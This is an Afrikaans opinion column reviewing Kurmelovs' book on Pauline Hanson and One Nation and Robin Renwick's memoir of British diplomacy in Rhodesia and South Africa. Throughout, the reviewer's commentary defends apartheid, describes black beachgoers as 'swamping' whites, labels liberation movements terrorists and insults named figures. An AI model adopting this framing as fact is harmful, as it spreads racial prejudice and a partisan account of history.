Die saambindende faktor in die teks is Pauline Hanson (gebore in 1954), “an iconic Australian brand” (202) en die leier van die politieke party One Nation. Sedert 2016 is sy en drie van haar partygenote senatore in die federale parlement in Canberra. One Nation is soos volg gekarakteriseer: “We are a predominantly working-class nationalist party – what some may call a ‘right wing’ workers’ party” (1407) – dus nie aan dieselfde kant as die Arbeidersparty nie. “What makes us a ‘workers’ party’ is that the membership and support base of One Nation is made up of often poorly paid, hardworking Aussies whose basic decency, quiet patriotism, strong moral compass and fierce work ethic define them as the heart and soul of our nation” (1413). Wat hieruit afgelei kan word, is dat One Nation se ondersteuners blankes is. Een van hulle huldig die volgende menings: “I’m not against immigration, we’ve had good people come into this country before. They didn’t live on handouts. I’m here [at a One Nation meeting] to stand for Australian values our forefathers fought for and to see that the Australian lifestyle, culture and laws that we have always known, carry on into the future” (2276).

Kurmelovs skryf: “Once Trump had gone global, all it would take was one heartfelt lie in a post-fact universe [or “post-truth politics” – 468]* for One Nation to sweep through those areas of the country that were so cynical, so withdrawn, they would turn the whole system on its head” (180). “One Nation shared its name with the title of a speech Don Watson had written for Labor prime minister Paul Keating [1991-1996], and she barnstormed the country to spread the word” (240).

[* Trump “was just the biggest, loudest voice engaging in ‘post-fact’ or ‘post-truth’ politics” (1330). Naas die geykte etiket “racist” is “post-fact” en “post-truth” die nuwe terme waarmee konserwatiewes sleggesê word as daar nie van hulle regse politiek gehou word nie. Maar Trump is eerder nasionalisties as regs.]

In die Wikipedia-artikel oor Hanson (waarvan Kurmelovs ruimskoots gebruik maak, veral in hoofstuk 2) word genoem dat sy van rassisme beskuldig word omdat sy gekant teen Asiate en swart Afrikane as immigrate is. Sy het swart Afrikane met die toename in misdaad in Australië verbind. Sy verwerp multikulturalisme en het haar gevolglik die verwyt van xenofobie/vreemdelingehaat op die hals gehaal. Sy het dit veral teen Moslems as immigrante. “We are in danger of being swamped by Muslims who bear a culture and ideology that is incompatible with our own.” Hanson het die owerheidsbevoordeling van die inheemse Australiërs (“Aboriginals” en die “Torres Strait Islanders”)* bo ander Australiërs as die uitdrukking van politieke korrektheid gekarakteriseer en dit as omgekeerde rassediskriminasie veroordeel.

[* In die Amerikaanse idioom noem Kurmelovs hierdie twee groepe “First Nations” (2965). Wie eerste op ‘n plek was, word deesdae polities byderwets beklemtoon, bv die Khoi-San in Suidelike Afrika. Van groter belang, myns insiens, is wat die verskillende etniese groepe tot stand gebring het. Die Torres-seestraat is tussen Australië en Papoea-Nieu-Guinee. Soos die ANC het albei die genoemde Australiese inboorlinggroepe hulle eie vlae, wat in die Wikipedia besigtig kan word. In Suid-Afrika mag ons vorige landsvlag eintlik nie meer vertoon word nie en ons vorige volkslied verkieslik nie gesing word nie. Ek dink Afrikaners behoort (soos Steve Hofmeyr) ongeïntimideerd voort te gaan met die sing van die pragtige “Die Stem”, want daarop kan kwalik verbeter word. Die vorige landsvlag was egter ‘n kompromie waarop verbeter kan/moet word, bv deur die Britse vlag weg te laat. Ek dink die tyd is ryp vir die ontwerp, bekendstelling en daarna die deurlopende en wydverspreide openbare vertoon van ‘n Afrikanervlag. As ‘n Australiese inboorlinggroep ‘n eie vlag kan hê, dan sekerlik ook die Afrikaners. Dit kan (aanvanklik) as ‘n kulturele eerder as ‘n staatkundige vlag gebruik word, bv die VOC-vlag (my broer se voorstel) of die Prinsenvlag (Dan Roodt se voorstel). Afbeeldings van albei verskyn in die Wikipedia.]

Hanson beskou globalisering en ander polities byderwetse standpunte as ‘n bedreiging vir Australiërs se identiteit. In Australië is daar – soos (veral voorheen) in Brittanje en Europa – in politieke geledere wydverspreide onwilligheid om te erken dat bv immigrant-ingevoerde multikulturaliteit probleme veroorsaak. Maar dink aan Enoch Powell (1912-1998) wat in Brittanje ‘n vroeë stem roepende in ‘n woestyn van ontkenning was (Praag 30 April 2016). In die hoofstroom-inligtingsmedia in Australië is daar sterk teenkanting teen Hanson se idees; dermate dat sy en haar partygenote verplig voel om hierdie media te vermy en hulle eerder tot die sosiale media te wend.

“When people start to worry about their future, they start to look for alternatives” (163). Dit is sekerlik die stadium waarin Afrikaners behoort te wees. Aan die begin maak Kurmelovs dit duidelik dat sy boek nie oor die politieke hoofstroom handel nie maar oor alternatiewe (69). “I did not want to write it from the perspective of the major parties … Instead, my book would be told from the perspective of the rogues and the strays who are now sitting in parliament” (91) – vandaar die boektitel. Hy beskou sy boek as “a field report on the health of our democracy,* asking why politics seemed to be unable to see the barbarians coming until they were storming the gate” (79). Dié formulering is (dalk) doelbewus dubbelsinnig. Word met daardie “barbare” die hedendaagse multikulturele stroom immigrante bedoel wat regse politici tot verset motiveer of verwys “barbare” na die al hoe groter aanhang wat regse politieke partye, bv One Nation, by die kiesers geniet?

[* Democracy functions when the losing side of an election continues to see their quality of life get better, despite the result” (2993). In hierdie sin is daar in die nuwe Suid-Afrika nie ‘n funksionerende demokrasie nie.]

Die persepsie bestaan dat immigrante werksgeleenthede van Australiese burgers ontneem. Hanson “was someone who preyed on the hopes and frustrations of working-class and country people” (85). “Hanson drew her support from women, the elderly, those without university qualifications and those in trades – who were all angry at the government” (3004). Kurmelovs wou eerstehands kennis met regse politici en hulle ondersteuners maak. “If I wanted to understand something [! – not someone/somebody] like Pauline Hanson with any real clarity, if I wanted to know what the hell happened out there, I had to be out there with the rest of them” (101).

Die verwagting dat Hillary Clinton in 2016 tot Amerikaanse president verkies sou word, word ‘n “collective delusion” genoem (118). Trump het die frase “drain the swamp” effektief in sy verkiesingsveldtog gebruik (147, 455) om te illustreer hoe van ongewenste dinge ontslae geraak moet word, net soos ‘n moeras sonder water nie muskiete/peste kan huisves nie. Trump het dieselfde woorde as voorgangers soos Ronald Reagan en Pat Buchanan gebruik. Maar selfs in die Wikipedia-artikel is daar geen blyke dat Benito Mussolini dieselfde frase vir politieke doeleindes benut het deur na die Poltine-moeras in Italië te verwys nie. Die volgende uitlating het my aan die ANC-regering herinner wat veral blankes, maar eintlik almal wat nie swart Afrikane is nie, vervreem en nogtans van nasiebou praat: “These days, they’re on about ‘Nation Building’ … But it’s a pie chart, not people. It’s figures in a book, not people” (1838).

Hanson het verwag dat Australië dieselfde koersverandering sou ondergaan as wat deur Trump en Brexit gesimboliseer word (281). Sy bewonder ook Vladimir Poetin se leierskap (2872). Daar is myns insiens heelwat onderliggende distansiëring, selfs vyandigheid, van Kurmelovs in die volgende twee aanhalings oor One Nation: “This [2016] was a turning point. Until then, the party had been a small but fanatical movement of Australian nationalists, each chasing their own unique vision of an Australia that no longer existed.* Then, it was a protectionist party, of the ‘Buy Australian’ variety. Now, it was hard-wiring itself into international networks of climate-change deniers and obscure ideological driven think tanks. In other words, One Nation was now speaking with an American accent” (310). “After all, she [Hanson] had done it first, before Brexit, before Trump, all the way back in ’96. She had championed a bizarre [?] ethno-nationalism before the internet helped similar groups network their way across the planet, and it had made her one of the most recognisable Australians … No, she was no Trump, but they were cut from the same cloth” (337).

[* Kurmelovs verwys hierna as “the poisonous nostalgia that has helped Hanson rise again” (3004). In Suid-Afrika word polities byderwets van Afrikaners verwag om nie nostalgies oor die verlede te wees nie. Sodanige nostalgie sou misplaas wees slegs as die hede beter is as wat die verlede was.]

“One Nation’s rise or fall depended on their ability to ‘professionalise’ in the way Marine Le Pen, daughter of French fascist Jean-Marie Le Pen, had done for her father’s party when she forced him out and took control” (1106). Hanson, anders as Marine le Pen, “will never become prime minister” (3031) omdat Hanson nie van dieselfde stoffasie as Marine le Pen is nie. Hanson se opgang, ondergang en terugkeer in die politiek herinner eerder aan “the dotcom bubble in the late nineties” (1202). ‘n Ondersteuner sê: Hanson “said a lot of things he agreed with, a lot of things he thought other people were too afraid to say” (2699). Maar daar is blykbaar nie genoeg onderliggende substansie en sigbare finesse by Hanson nie. Die toespraak van Hanson wat Kurmelovs in besonderhede aanhaal (2799), klink goed beredeneerd, maar die vraag is of sy dit geskryf het. Dit is kommerwekkend dat daar in One Nation nie ‘n plaasvervanger vir Hanson te bespeur is nie. Haar partygenote word “Pauline Hanson-lite” genoem (1929). Hanson het aanvanklik te vroeg met haar goeie idees op die politieke terrein verskyn. Noudat daardie idees al hoe meer aanvaarding verwerf, lyk dit asof Hanson en One Nation nie oor die vaardighede beskik om werklik ‘n deurbraak te maak nie. Maar juis omdat daardie idees aanvanklik onbekend of ongewild was, is dit onaanvaarbaar om hulle sonder meer as populisties te etiketteer.

In die laaste hoofstuk wys Kurmelovs openlik sy ware politieke kleure. Hy besoek die vis- en skyfieswinkel wat Hanson voor haar loopbaan as politikus in Ipswich bedryf het, asof dit noodwendig ‘n ongunstige assosiasie moet wees. Die outeur verlekker hom oor die feit dat Viënamese nou die besigheid besit, dus Asiatiese immigrante waarteen Hanson gekant is: “I … soak in the glorious irony of a Vietnamese refugee family taking over a chip shop once owned by the woman who raised her voice over fears about ‘being swamped by Asians’ and hordes of boat people” (2941). Kurmelovs noem daardie sake-onderneming sonder meer “the birthplace of Australian fascism” (2941). Dít kom van Kurmelovs wat Marine le Pen se National Front-party (onlangs hernoem as Rassemblement National/National Rally) sommer ook as “fascism rebranded” karakteriseer (3111).

“Hanson worked this joint [the fish and chips shop], hers was an ant’s-eye view of the world, with all the limits and constraints and distortions that entails. Everything seems bigger with that perspective. Everything makes you afraid. The newpaper headlines seem louder, so too does the television” (2959). Die armoede, onsekerheid en onvergenoegdheid wat Kurmelovs op die Australiese platteland teëgekom het, bly egter ‘n werklikheid wat nie ontken kan word nie. In hierdie opsig het Hanson nie verkeerd nie. “Economic problems, after all, are felt as cultural problems. Class may frame an issue, but race contours or deepens it. Social media then transmits the result” (2976).

Hanson word beskryf as “a product of random chance that has rewritten the rule book” (3059). “Without her name, One Nation is nothing” (3105). “No amount of data … could have predicted that one racist letter to a Brisbane newspaper would have triggered a series of events that saw Pauline Hanson pushed onto the national stage, leading to a fundamental restructering of the right in Australian politics with long-term consequences for issues as diverse as Aboriginal land rights, refugee policy and even climate change” (3070). “She is a woman of broad strokes, with an aggressive, short-term, transactional approach to politics and an intuitive feel for exploiting people’s arrogrance, anger and hurt, all in the right place, at the write time” (3082). “The people who vote One Nation … may not believe half of what Hanson says, if they’re being honest, but that is not the point. All that matters is that she connects, on some level, with their frustration, their resentment, their need to be recognised as clued in to what’s ‘really going on’, and that she seems to scare the living hell out of the bastards. The louder the outrage, the sweeter the sound” (3093).

Oor die genoemde “racist letter” skryf Kurmelovs: “Hanson penned a letter to the editor of the Queensland Times on 6 January 1996, complaining that white deaths in custody were being overlooked and Indigenous people were being ‘showered with money’”(213). Sy was toe ‘n lid van die Liberale Party. Van 1994 tot 1995 was sy ‘n stadraadslid vir Ipswich. In 1996, toe haar brief gepubliseer is, was sy ‘n kandidaat in die federale verkiesing. Toe hy van die brief hoor “John Howard, as leader of the Liberal Party, dropped her from the ticket and banished her from the party” (218). Op die stembriewe het “Liberal Party” egter steeds teenoor haar naam gestaan. Sy is verkies en het as ‘n onafhanklike haar plek in die federale parlement in Canberra ingeneem (1996-1998).

Fascisme het ‘n verskeidenheid kenmerke sodat die term op sowel linkse as regse politieke verskynsels toegepas kan word. Madeleine Albright skryf: “‘Fascist’ was the most versatile of insults” en “To use the term ‘Fascist’ is to reveal oneself” (Praag 19.05.2018). Kurmelovs het sy politieke gesindheid geopenbaar deur Hanson met die teerkwas van rassisme en fascisme by te kom. Wat hy eintlik wou tuisbring, is dat hy nie van haar politiek hou nie. Kurmelovs is deel van Australië se stedelike politieke establishment. Sy veldwerk op die platteland het hom nie daartoe beweeg om sy politieke heil buite die hoofstroom te soek nie.

Wat die Engelsman nie wil sien nie, dit sien hy nie

Robin Renwick (gebore in 1937) was ‘n Britse regeringsverteenwoordiger in Rhodesië (1978-1980) toe die politieke mag van die blanke bewind na swart terreurgroepe oorgegaan het. Hierna was Renwick die Britse ambassadeur in Suid-Afrika (1987-1991), dus toe dieselfde situasie besig was om plaaslik te ontvou. Margaret Thatcher (1979-1990) en daarna John Major (1990-1997) was toe die Britse eerste minister. Renwick was lid van die Britse Arbeidersparty en uiters goed toegerus om die plaaslike blankes sover moontlik te benadeel. Hy is vir sy pro-swart gesindheid vergoed deur hom as die Britse ambassadeur in Amerika (1991-1995) aan te stel.

Die opskrif van hierdie rubriek is ontleen aan MER (Maria Elizabeth Rothmann, 1875-1975) se stelling oor wat kenmerkend van ‘n “Engelsman”/Brit is: “Wat hy nie wil sien nie, dit sien hy nie” (My beskeie deel, Kaapstad: Tafelberg, 1976, p 22). Hierdie stelling is in uitnemende mate op Renwick van toepassing. Soos hier onder blyk, is dit moeilik om ‘n bedrywiger en lastiger diplomatieke gatvlieg as Renwick voor te stel. My uiteensetting is gebaseer op sy boek, Mission to South Africa: Diary of a revolution(Johannesburg: Jonathan Ball, 2015, 139p; Amazon Kindle $11,39). Hierdie rubriek behoort teen die agtergrond van FW de Klerk se lewensbeskrywing gelees te word. Tydens my bespreking van daardie outobiografie is verskeie kere na Renwick verwys (Praag 23 September).

In die proloog skryf Renwick oor sy betrokkenheid by Rhodesië, wat in 1980 as Zimbabwe onafhanklik geword het en sedertdien ‘n uiters bedenklike voorbeeld van swart regering is. Die terreurbendes van Robert Mugabe en Joshua Nkomo word “liberation forces” (Kindle 145) of “guerrillas” (201) genoem. “As for Mugabe’s tactics, one of the principal methods used to bring areas of the country under his forces’ control was the torture, mutilation and execution of village headmen in front of the villagers” (208). Tydens ‘n besoek aan Zambië Thatcher “added, to my dismay, that she had no plans to send British troops to Rhodesia” (228). Renwick wou hê dat Brittanje militêr moet ingryp ná Ian Smith se eensydige onafhanklikheidsverklaring.

Toe Smith later Brittanje besoek, het Thatcher besluit “having nothing whatever to do with Ian Smith, who had been greeted with applause by airport workers on his arrival in Britain and fêted by some right-wing members of her party” (238). Thatcher het geweier om met Smith gesprek te voer. Renwick verwys na “the brooding and sardonic presence of Ian Smith” en “his grating voice” (258) tydens die grondwetlike onderhandelings. Dwarsdeur die boek gebruik Renwick positiewe byvoeglike naamwoorde wanneer hy na linkses verwys en negatiewe byvoeglike naamwoorde vir nie-linkses, bv diegene wat pro-blank gesind is.

Peter Carrington (gebore in 1919 — die bliksem lewe steeds), die Britse minister van buitelandse sake (1979-1982), het Smith en die leiers van die terroristebewegings vir samesprekings ontmoet. “When Smith complained … that we were dragging out the conference while people were being killed in Rhodesia, the normally imperturbable Carrington lost his temper completely. Purple with anger, he told Smith that the responsibility for the war … rested squarely with him” (258). Onderhandel nou met ‘n Brit wat dermate bevooroordeeld is. Dit is terroris-invalle wat die oorlog veroorsaak het, maar Renwick verwys eerder na die Rhodesiërs “launching ferocious cross-border raids” (201) in Zambië en Mosambiek (268); invalle wat uit selfverdediging gedoen is.

Net soos die terroristiese Swapo later in Suidwes-Afrika sou doen (1309),* het Mugabe nie die wapenstilstand in Rhodesië eerbiedig nie, “Mugabe used his forces outside the assembly area to intimidate the villagers” (314). Renwick roem op sy eie “impartiality” (324) terwyl hy hom heelhartig by die swartes geskaar en sy anti-blanke gesindheid daarna in Suid-Afrika voortgesit het. Die Rhodesiese onafhanklikheidsverkiesing was glo “free and fair” (324), maar lees gerus ‘n ooggetuieverslag oor hoe terroriste toegelaat is om vryelik en ten volle gewapen by die stemlokale rond te hang.** Renwick skryf oor Thatcher: “Though she was no friend of the liberation movements, it was thanks to her willingness to take the necessary risks that we had been able to end the Rhodesian war” (2523).

[* Thatcher wou nie hê dat die Suid-Afrikaanse regering sonder die goedkeuring van die Verenigde Nasies teen Swapo se verbreking van die wapenstilstand optree nie: “If the South Africans took unilateral action, ‘the whole world will be against you – led by me!’” (1318). Die bemoeisieke Renwick wou die Swapo-terroriste soveel moontlik beskerm: “I argued fiercely against air strikes … As I returned to Windhoek, I was told that the UN had accepted the need for action to deal with the incursions and Pik Botha told me the air strikes had been called off. Ground forces and police units were allowed to deploy instead” (1326).]

[** “With an estimated 35 000 insurgents flooding into the country to vote, and to cause trouble if the outcome was not to their liking, the security forces certainly had to be on their toes” (George Selby, From safari suit to camouflage, edited by Lillian van Velden, Partridge Publishing, 2016, 276p; Amazon Kindle $4,55, 4498). “It was amazing just how many blacks had already gathered for the next day’s voting, many of them carrying weapons: RPG-7s, machine guns, and rifles” (4557). “As more and more insurgents came out of the bush, so did intimidation and beatings of the locals, who had no choice but to vote for whom they were told” (4580). “The three days of polling were full of tension as many heavily armed insurgents loitered around the polling station” (4617). Vir meer inligting: “Verraad in Rhodesië/Zimbabwe en Suid-Afrika (Praag 3.04.2016).]

In die eerste paragraaf van sy boek verwys Renwick na apartheid/afsonderlike ontwikkeling as ‘n “fundamentally abhorrent system” (35); daardie Brits-geïnisieerde beleid van rasse-segregasie wat die land vir blankes leefbaar en Europese beskawing eeue lank in Suidelike Afrika moontlik gemaak het. Later verwys hy na die PW Botha-regering as “this highly autocratic system” (1053). Renwick roem daarop dat Brittanje, wat buitelandse regerings betref, die hoofrol in die myns insiens skandalige plaaslike politieke revolusie gespeel het (45). “Great admirer as I am of George Bush senior, he did not make anything like as strenuous an effort as Thatcher did to bombard [!] the South African government with demands for reform and the release of Mandela” (1461).

Ten spyte van al die bedenklikhede wat feitelik korrek aan Nelson Mandela toegeskryf kan word, verklaar Renwick: “My admiration for him was second to no one’s … the great man” (45; ook 2179). “He did indeed have some saintly characteristics … the authentic Mandela, generous in spirit, libertarian by instinct, and inspirational to everyone he met – including me” (62). Ná Mandela se vrylating Renwick “met him in the tiny match-box-style house he had returned to … The contrast was dramatic between these humble surroundings and the quality of the man inside” (1788). “His old-world courtesy and unfailing charm served to mask a steely determination not to compromise any of the principles for which he and others had sacrificed their liberty or lives” (1797).

Die (meeste) toegewings sou van FW de Klerk se kant kom. Desnieteenstaande skryf Renwick: Mandela “showed a much greater commitment than others to genuine political tolerance” (1797). Mandela was egter ‘n bakhandstanende “heilige”: “At the end of every meeting I had with him, he would never fail to ask for money for the ANC” (70). In Renwick se oë is Desmond Tutu ook wonderlik: “I was a wholehearted admirer” (706). Toe ses swartes vir die moord op die onderburgemeester van Sharpeville ter dood veroordeel is, het die bemoeisieke Renwick vir Tutu opgesteek om Thatcher oor te haal om by PW Botha om begenadiging te pleit (877). Oliver Thambo was volgens Renwick ook wonderlik: “I was very impressed by the scholarly and thoughtful Tambo” (1788).

Die kettingroker FW de Klerk word uiteraard positief deur Renwick voorgestel omdat De Klerk daarin geslaag het om blanke politieke mag mandaatloos aan swart mag oor te gee. “I found him to be open, friendly and impressively self-confident” (673). Ook: “FW de Klerk was friendly, approachable, personally impressive” (1064) en “I had been impressed by De Klerk’s strength of character” (1083). “I was able to establish a regular pattern of meetings with De Klerk” (1141). “I always found him focused on getting to the next stage and never losing sight of the goal, which was to agree [to] a new constitution that would give political rights to all South Africans” (97).

Daar is ‘n De Klerk-kenmerk wat myns insiens ‘n deurslaggewende rol in sy oorgawe aan swart mag gespeel het: “De Klerk said that he was not security-dominated in his thinking” (1113). “In his first decision as President, he had banned use by the police of the sjambok” (1490); eintlik knuppel. Na sy toespraak in die parlement op 2 Februarie 1990 “virtually all the troops had been withdrawn from the townships” (1711). In sy naïwiteit het De Klerk geen idee gehad van die boosheid van die vyand waarmee hy spoedig onvoorwaardelik onderhandel het nie. Onmiddellik na sy vrylating Mandela “reaffirmed his commitment to the armed struggle … ‘Now is the time to intensify the struggle on all fronts’” (1723). Maar Douglas Hurd, die Britse minister van buitelandse sake (1989-1995) het De Klerk beskryf as “an amazingly brave and wise man” (1893).

In sy boek wou Renwick ‘n lansie vir Thatcher breek: “I hope that this book will lay finally to rest the contention that Margaret Thatcher was ‘a friend of apartheid’ and called Nelson Mandela a ‘terrorist’ (which, as a matter of fact, she never did)” (114); wat nie impliseer dat Mandela nie ‘n terroris was nie. By geleentheid het die ANC probeer om Thatcher af te dreig met “British businesses in South Africa would become legitimate targets for attack” – “if she continued to oppose sanctions” (759). Die Britse sanksies het “arms, oil and nuclear embargoes” ingesluit (1760) maar nie algemene handelsanksies nie. “Understandably irritated, she replied that this showed what a typical terrorist organisation the ANC was” (759). “Thatcher had never been an admirer of the ANC, given that the ‘armed struggle’ had been extended to civilian targets and included the necklacing of ‘collaborators’, and that the organisation was committed to nationalisation of much of the economy. Moreover, she had not failed to notice that, despite the SACP’s lack of any mass support, two-thirds of the ANC’s politburo were members of the SACP” (759).

Waarop Thatcher deurgaans aangedring het, was “the release of Nelson Mandela, the repeal of all the apartheid laws and independence for Namibia” (123) en “the front-line states should be spared further attacks by the South African armed forces” (412). Renwick het aan Thatcher voorgestel hoe sy die PW Botha-regering kon afdreig: “any major cross-border raids … would make her position intolerable and result in the withdrawal of her support” (500). In 1983 het Thatcher geskryf “that the exclusion of blacks from the political process was ‘a powerful factor in compelling black politicians to seek by violence what is denied to them by the laws under which they live’” (392). Op hierdie manier word terrorisme goedgepraat.

Soms het Thatcher se deuntjie ietwat verander: “She was, she said, against all forms of terrorism, but the ANC was an important factor in South African politics. The question was how to get them to give up violence” (1013). Die ANC was so verknog aan geweld dat hy dit nooit afgesweer het nie. FW de Klerk se “oplossing” was om met hierdie gewelddenaars te onderhandel terwyl hulle terselfdertyd met hulle geweld voortgegaan het, met uiteindelik die katastrofiese resultaat van oorgawe aan swart mag. Ná haar eerste ontmoeting met Mandela het Thatcher gesê: “‘I warmed to him.’ She told Mandela that he would get support from the British government in the negotiations for a new constitution … She concluded that ‘South Africa was lucky to have a man of Mr Mandela’s stature at such a time’” (2142).

Toe Renwick sy geloofsbriewe as ambassadeur oorhandig het, het hy ‘n deel van sy toespraak in Afrikaans gelewer (529), want “I had resolved to concentrate my efforts on the Afrikaners and the black leadership” (520). Renwick noem die blanke politieke bewind ‘n “regime” (bv 373, 480; “that ironclad regime” – 2594) en daar was toe glo ‘n “siege mentality” (383) by Afrikaners. PW Botha wou hê dat die ANC se kantoor in Londen, van waar sy terreurbedrywighede bedryf is, gesluit moet word, maar Thatcher het beweer dat die ANC-kamerade hulle nie aan onwettige bedrywighede skuldig maak nie (403, 944). Ronnie Kasrils is egter toegelaat om Londen te besoek “even though MK had declared that it would be targeting ‘soft’, ie civilian, targets” (953). Wat volgens die Britse regering glo wel onwettig was, was die inbrake in die Londense kantore van die ANC en Swapo deur die “apartheidsregime” se Craig Williamson (412).

“Following the assassination of Dulcie September, the ANC representative in Paris, in March 1988, we became concerned about the possibility of an attack on ANC personnel in London. The Prime Minister [Thatcher] decreed that we must give the South African government the clearest possible warning that any such action would attract a strong reaction from us” (1123), wat duidelik toon dat die Britse regering kop in een mus met die terroristiese ANC was. In 1989 was daar ‘n interessante verwikkeling. “South African agents had supplied a rocket launcher and training to a Northern Ireland Protestant paramilitary splinter group” (1373). Thatcher het toe van PW Botha geëis: “The South African arms procurement agency, Armscor, must be told to cease their activities in the United Kingdom” (1384). Dus, die ANC mag Suid-Afrika vanuit Brittanje militêr ondermyn, maar Suid-Afrika mag nie militêr in Britse sake betrokke wees nie.

Renwick het Pik Botha, toe die minister van buitelandse sake, gewaarsku teen Suid-Afrika se ondersteuning van Renamo se bedrywighede teen die kommunistiese bewind in Mosambiek (520). Kontrasteer die volgende gemene beskrywing van Pik Botha met hoe Renwick Mandela, Tutu en De Klerk beskryf: “Built like a buffalo, he would sit in his shirtsleeves, a thick black lock of hair falling across his face, complaining about the world’s supposed injustice towards South Africa … an accomplished actor … his faults … were not small ones” (1229).

Volgens Renwick PW Botha “never forgot that his mother had been interned by the British during the Anglo-Boer War” (546). Waaraan het tweegesprekke met PW Botha vir Renwick herinner? “Conjuring up images of what it must have been like calling on the Führer in his bunker” (546). Renwick lug later weer sy smerige begeerte om PW Botha met Adolf Hitler se vergelyk: “The last-ditch atmosphere around PW Botha was like that which must have prevailed around Hitler in his bunker” (1042). Oor PW Botha se uittrede as president skryf Renwick: “I doubted that he would agree to go gracefully, but felt a sense of great relief and satisfaction at seeing the last of him. For this was a man who never should have been put in charge of the fortunes of his or any other country” (1413). Renwick sê nie iets soortgelyks van enige swarte nie; dus ook nie van bv Jacob Zuma of Robert Mugabe nie.

PW Botha “exercised a reign of terror over the cabinet. He believed in intimidation across the board” (750). Daar was ook “PW Botha’s chief henchman, the Minister of Defence, Magnus Malan, leader of the group of so-called securocrats … Malan was a great believer in ‘taking out’ enemies of the regime, internally through special force units, which had developed into assassination squads, and externally by whatever means were necessary” (657). “If the security police and military intelligence were allowed to continue their activities, including murder squads, unchecked, there was no way any of us were going to be able to help South Africa” (1104). Renwick verwys na “the lunatic fringes of the security establishment” (1384) maar die misdadige optrede van swart terreurbendes word nêrens deur Renwick veroordeel nie. Die naaste wat hy daaraan kom, is wanneer hy verwys na “the equally violent record of members of the security forces” (1874).

“The politics of the white community remained quite tribal” (582). Dit geld eerder vir die swartes, maar Renwick sê dit nie. Renwick wou graag by die UDF, “the future leadership of the country” (624), kruip, maar sy pogings is bemoeilik weens Thatcher se teenkanting teen algehele sanksies. Wat Renwick toe gedoen het, is om met Britse belastingbetalers se geld “over three hundred projects” (633) van ‘n filantropiese aard in swart gebiede van stapel te stuur. “We also had launched a US$20 million programme to provide scholarships for black South Africans. We also were giving direct help to a lot of church and community group projects in the townships” (725). Na dese kan niemand beweer dat die Britte nie weet hoe om op grond van ras swartes te bevoordeel en blankes uit te sluit nie. Ná Mandela se vrylating was die Britse gebaar “rescinding the voluntary embargoes on tourism and new investment. The other embargoes would continue, but it made no sense to discourage academic and scientific contacts with the liberal English-speaking universities, where we were supporting a number of black students” (1806).

“I also tried to establish friendships with a number of ex-Robben Islanders” (640) en ander swart politieke leiers. “A number of Robben Islanders became regular visitors to the embassy, as did a number of National Party MPs” (649), wat vir Renwick gehelp het om die Nasionale Party te rysmier: “Some at least among them could hardly fail to be impressed by the qualities of those the regime had condemned to years of imprisonment for their political acts and views” (657). Die (opportunistiese) politieke begeertes van swartes word “legitimate aspirations” genoem (824). Oor die “apartheidsregime” beweer Renwick “you [are] isolating yourselves” (915). Die ANC, PAC en Swapo se terreurbendes word nie terroriste genoem nie maar “guerrillas” (bv 1159).

Wat Renwick gedoen het, is om aktief gesprekke te voer met verskillende elemente ten einde die politieke magsoorgawe aan swartes te bevorder. Enersyds was daar die spreekwoordelike nuttige idiote in die Nasionale Party soos FW de Klerk, Pik Botha, Kobie Coetzee, Barend du Plessis en Dawie de Villiers, asook amptenare soos Gerhard de Kock, die goewerneur van die Reserwe Bank, en Neil van Heerden, die direkteur-generaal van buitelandse sake. Dan was daar linksgesinde Afrikaanssprekendes soos Jan Steyn, Willem de Klerk, Willie Esterhuyse, Pieter de Lange en Johan Heyns wat vatbaar vir Renwick se ondermyning was. In opposisiegeledere was daar bv Harry Oppenheimer, Helen Suzman en Van Zyl Slabbert. Suzman se siening van De Klerk word soos volg verwoord: “She saw him not as a starry-eyed liberal, but as a pragmatic, intelligent man who understood what needed to be done to secure the country’s future” (1403).

Afrikaanse joernaliste soos Ton Vosloo en Willem Wepener het gesorg dat Renwick se idees oor bv politieke regte vir swartes in Naspers se koerante gepubliseer word. Renwick “hand over sufficient funding for the paper [Weekly Mail] to survive for … three months” sodat Anton Harber sy kritiek op die “apartheidsregime” kon voortsit (794). Renwick se pro-swart inmenging in die Suid-Afrikaanse politiek het geen grense geken nie. In gesprek met De Klerk Renwick “raised also the issue of abolition of the death penalty” (1646). Op die vooraand van die Statebondskonferensie in Oktober 1989 Renwick “had used its proximity, unashamedly, to accelerate the release of Walter Sisulu and his companions” (1557).

“I went to Soweto to meet Walter Sisulu and the other released Robben Islanders … I told them that I had spoken to the government about the need not to interfere with the planned rally to welcome them back to Soweto … It was an emotional occasion to meet at last these legendary figures in the history of the ANC. None of the venerable gentlemen … looked very much like revolutionaries, though several were members of the SACP” (1574). “In his public statements following his release, Sisulu continued to emphasise the armed struggle. He also called for more sanctions” (1584).

Toe Kobus Meiring as die administrateur van die Kaapprovinsie aanstel is, “I asked him to promise at last to open the magnificent beaches to South Africans of all races. Kobus, whose own apartment at the Strand was on a still-segregated beach, needed no persuasion to do so” (1132). Weens verswelging deur swartes is daar deesdae op die gewildste vakansiedae in die somer in die Strand, soos in bv Durban, geen blankes op die strand nie. Dit is ‘n omgekeerde situasie. Blankes moes hulle tradisionele ontspanningsplekke aan swartes afstaan. Die nuwe omstandighede benadeel Suid-Afrikaanse blankes ingrypend maar nie vir Renwick wat knus in Engeland woon nie. Polities byderwets word dit geregtigheid genoem.

Renwick het Suidwes-Afrika besoek toe Suid-Afrikaanse troepe in Angola militêr teen Swapo en (ander) kommunistiese magte bedrywig was. Let op Renwick se bevooroordeelde invalshoek: “I was briefed by a half-mad South African colonel on the battle of the Lomba River … On the struggle against Swapo in Namibia, he took the view that victory was certain — but for the efforts of the enemy within. When I inquired who the enemy within were, he replied: ‘The churches, the trade unions and the teachers’” (1193). Renwick het nie daarvan gehou dat kommunistiese magte deur die Suid-Afrikaanse troepe opgehel word nie. “I asked the South Africans whether they did not think they were in danger of overreaching themselves. Johan Heyns inquired publicly whether it made sense to have men ‘defending South Africa’ two hundred miles inside Angola” (1211). Dus, voorspringaksies moet nie buite Suid-Afrikaanse grondgebied uitgevoer word nie; ons moes wag totdat terroriste ons land binnegedring en verwoesting plaaslik gesaai het. Die onafhanklikwording van Suidwes-Afrika word soos volg deur Renwick beskryf: “Namibia returned to legality” (1301).

Ná sy vrylating Mandela “needed some practical help from us. Not wanting to rely for his security only on the South African police, he asked us to provide training for his personal bodyguards, which we arranged for the SAS [British Special Air Service] to do. Later on, when he moved to his wife’s much larger house, he asked for our help in providing better privacy and security there” (1833). Die Britte kon nooit genoeg by Mandela kruip nie. Toe Mandela Brittanje en Amerika besoek het, het die goeie Britte vir hom gedoen wat hulle kon: “To give him some rest before going there [America], we planned to arrange for him to spend a quiet weekend in the English countryside with his great friend and colleague Oliver Tambo” (2076).

